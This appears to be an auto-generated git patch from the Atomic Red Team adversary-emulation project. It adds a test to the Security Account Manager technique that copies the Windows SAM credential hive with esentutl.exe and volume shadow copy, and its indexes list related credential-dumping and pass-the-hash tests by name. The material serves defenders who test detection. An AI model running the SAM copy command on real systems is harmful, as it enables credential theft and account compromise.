From 5d59fdbce108bf3d146bf04f52fdd3e52ca7cd40 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 17 Jul 2020 15:13:28 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 27 +++++++++++++++ atomics/T1003.002/T1003.002.md | 34 +++++++++++++++++++ atomics/T1003.002/T1003.002.yaml | 1 + atomics/used_guids.txt | 1 + 8 files changed, 67 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index cc8c9365..5b3871ec 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -196,6 +196,7 @@ credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt +credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 305a81be..793d9339 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -430,6 +430,7 @@ credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSp credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt +credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index ae021a8b..1c22c69d 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -419,6 +419,7 @@ - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #2: Registry parse with pypykatz [windows] + - Atomic Test #3: esentutl.exe SAM copy [windows] - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 01e868a2..7d885392 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -875,6 +875,7 @@ - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #2: Registry parse with pypykatz [windows] + - Atomic Test #3: esentutl.exe SAM copy [windows] - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0db39334..86f094f1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -19346,6 +19346,33 @@ credential-access: executor: command: 'pypykatz live registry +' + name: command_prompt + elevation_required: true + - name: esentutl.exe SAM copy + auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 + description: | + Copy the SAM hive using the esentutl.exe utility + This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the file to copy + type: Path + default: "%SystemRoot%/system32/config/SAM" + file_name: + description: Name of the copied file + type: String + default: SAM + copy_dest: + description: Destination of the copied file + type: String + default: "%windir%" + executor: + command: 'del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} + /d #{copy_dest}/#{file_name} + ' name: command_prompt elevation_required: true diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index af43cdbb..61b63f28 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -28,6 +28,8 @@ Notes: - [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz) +- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy) +
@@ -117,4 +119,36 @@ pip3 install pypykatz +
+
+ +## Atomic Test #3 - esentutl.exe SAM copy +Copy the SAM hive using the esentutl.exe utility +This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM| +| file_name | Name of the copied file | String | SAM| +| copy_dest | Destination of the copied file | String | %windir%| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} +``` + + + + + +
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 887d0a7a..ae3312a1 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -54,6 +54,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: esentutl.exe SAM copy + auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 description: | Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index aba5a1bf..524b9d6a 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -548,3 +548,4 @@ d9841bf8-f161-4c73-81e9-fd773a5ff8c1 0b19f4ee-de90-4059-88cb-63c800c683ed 315f4be6-2240-4552-b3e1-d1047f5eecea a123ce6a-3916-45d6-ba9c-7d4081315c27 +a90c2f4d-6726-444e-99d2-a00cd7c20480